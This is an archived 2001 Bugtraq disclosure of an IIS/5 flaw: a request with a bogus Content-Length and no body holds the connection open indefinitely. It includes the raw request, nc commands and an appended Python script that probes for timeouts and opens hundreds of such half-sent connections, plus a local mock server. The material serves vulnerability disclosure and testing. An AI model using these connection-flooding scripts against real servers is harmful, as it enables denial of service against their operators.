Microsoft IIS/5 bogus Content-length bug Memory attack

From: Ivan Hernandez Puga (ivan.hernandezat_private)
Date: Tue Dec 11 2001 - 11:11:05 PST


    Hello. Me again
    
    For something like 4322 open connections with the method described
    before, the Windows 2000 server grows its memory from 404 MB to 920 MB.
    It's just a brute force hack and I suppose that competent application
    software will handle it.
    Windows 2000 is with SP2 and IISLockDown tool + URLScan filters.
    Nothing more now. 
    Thanks 
    Ivan Hernandez
    
    
    -----Original Message-----
    From: Ivan Hernandez Puga
    Sent: Tuesday, December 11, 2001 12:32 PM
    To: 'focus-msat_private'
    Cc: bugtraqat_private
    Subject: Microsoft IIS/5 bogus Content-length bug.
    
    Let's say that it's a bug, not a security flaw, but it probably can
    lead to denial of service with some tweaking.
    When you send a bad request to Microsoft IIS/5.0 server it gives
    you the error and closes the connection, like when you fail to
    authenticate.
    Well... let's take a look at a normal request:
    GET /testfile HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
    application/vnd.ms-excel, application/vnd.ms-powerpoint,
    application/msword, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: 192.168.0.10
    Connection: Keep-Alive
    Authorization: Basic
    
    And then let's add a "Content-Length: 5300643" field.
    
    When you send the new request to the server it hangs there waiting
    for something to happen and never closes the connection.
    
    Let's try this:
    # The blank line after the last header ends the header block, so the
    # server starts waiting for the 5300643 bytes of body that never come.
    $ cat >bogus.txt <<'EOF'
    GET /testfile HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: 192.168.0.10
    Connection: Keep-Alive
    Content-Length: 5300643
    Authorization: Basic

    EOF
    $ sed -i 's/$/\r/' bogus.txt    # HTTP wants CRLF line endings
    
    $ nc 192.168.0.10 80 <bogus.txt &
    $ ps x
          PID    PPID    PGID     WINPID  TTY  UID    STIME COMMAND
          696       1     696        696  con  500 12:22:37
    /usr/bin/bash
         2464     696    2464       2464  con  500 12:23:56 /usr/bin/nc
         2532     696    2532       1552  con  500 12:29:16 /usr/bin/ps
    
    $ netstat -an |grep 192.168.0.10
      TCP    192.168.0.4:2479       192.168.0.10:80        ESTABLISHED
    
    Now you have a waiting open connection. You can open as many as you
    want. The server never stops the connections and I have seen no
    timeout.
    
    Well, I left this here.
    
    Thanks for taking the time to read this
    
    Ivan Hernandez
    
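The check a practitioner wants after reading the post is twofold: does a given server actually time out a request whose Content-Length promises a body that never arrives, and how many such half-sent requests can be parked at once. The script below is an added example written for this page, not code from the original post or from Microsoft. `build_request` produces the same kind of headers-only request as bogus.txt (with the CRLF line endings HTTP requires), `probe_body_timeout` reports whether and when the server hangs up, and `hold_connections` opens many such connections in one go, replacing the repeated `nc ... &`. The `HeaderHoldingServer` class, the 127.0.0.1 host, and all timing values are assumptions for offline testing; its leaky mode only mimics the behaviour the post reports and is not a model of IIS internals.

```python
import socket
import threading
import time


def build_request(host, path="/testfile", content_length=5300643):
    """Headers only, CRLF-terminated: a Content-Length with no body behind it."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
        "Connection: Keep-Alive",
        f"Content-Length: {content_length}",
        "Authorization: Basic",
    ]
    # The empty line closes the header block, so the server now waits for the body.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def probe_body_timeout(host, port, wait=5.0):
    """Send the headers, never the body, and wait up to `wait` seconds.

    Returns (closed_by_server, elapsed_seconds, bytes_received). A server with a
    body/idle timeout hangs up (or answers an error) well inside `wait`; the
    post's IIS/5 never did, which shows up here as closed_by_server=False."""
    sock = socket.create_connection((host, port), timeout=wait)
    sock.sendall(build_request(host))
    start = time.monotonic()
    received, closed = b"", False
    try:
        while (remaining := wait - (time.monotonic() - start)) > 0:
            sock.settimeout(remaining)
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break                    # still open when the deadline passed
            except ConnectionResetError:
                chunk = b""              # a RST ends the connection just the same
            if not chunk:                # EOF: the server hung up
                closed = True
                break
            received += chunk
    finally:
        sock.close()
    return closed, time.monotonic() - start, received


def hold_connections(host, port, count):
    """Open `count` half-sent requests at once (the post's repeated nc runs).
    Keep the returned sockets referenced; the server-side state lives as long as
    they do. Watch ESTABLISHED grow with netstat on the server."""
    socks = []
    for _ in range(count):
        s = socket.create_connection((host, port), timeout=5.0)
        s.sendall(build_request(host))
        socks.append(s)
    return socks


class HeaderHoldingServer:
    """Throwaway local server (an assumption, not IIS): reads the headers, then
    holds the socket forever (idle_timeout=None, the reported behaviour) or
    closes it after idle_timeout seconds without a body (the hardened case)."""

    def __init__(self, idle_timeout=None):
        self.idle_timeout, self.clients = idle_timeout, []
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))   # port 0: the OS picks a free port
        self.listener.listen(128)
        self.port = self.listener.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.listener.accept()
            except OSError:
                return                           # listener closed
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        buf = b""
        while b"\r\n\r\n" not in buf:            # read up to the end of the headers
            chunk = conn.recv(4096)
            if not chunk:
                conn.close()
                return
            buf += chunk
        if self.idle_timeout is None:
            self.clients.append(conn)            # leaked: never closed, never times out
            return
        conn.settimeout(self.idle_timeout)
        try:
            conn.recv(1)                         # wait for the promised body...
        except socket.timeout:
            pass                                 # ...then give up and free the slot
        conn.close()

    def close(self):
        self.listener.close()
        for c in self.clients:
            c.close()
        self.clients = []
```

Against a real host you own, `probe_body_timeout(host, 80, wait=120)` returning `closed_by_server=False` means the server kept the connection for two minutes with no body and no error, the behaviour the post describes; a hardened server closes long before that. `hold_connections(host, 80, 500)` then lets you watch the server's connection count and memory on its own netstat and task manager, which is what the post's first message measured by hand. The local `HeaderHoldingServer` is only there so the two functions can be exercised offline.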



    This archive was generated by hypermail 2b30 : Tue Dec 11 2001 - 14:53:02 PST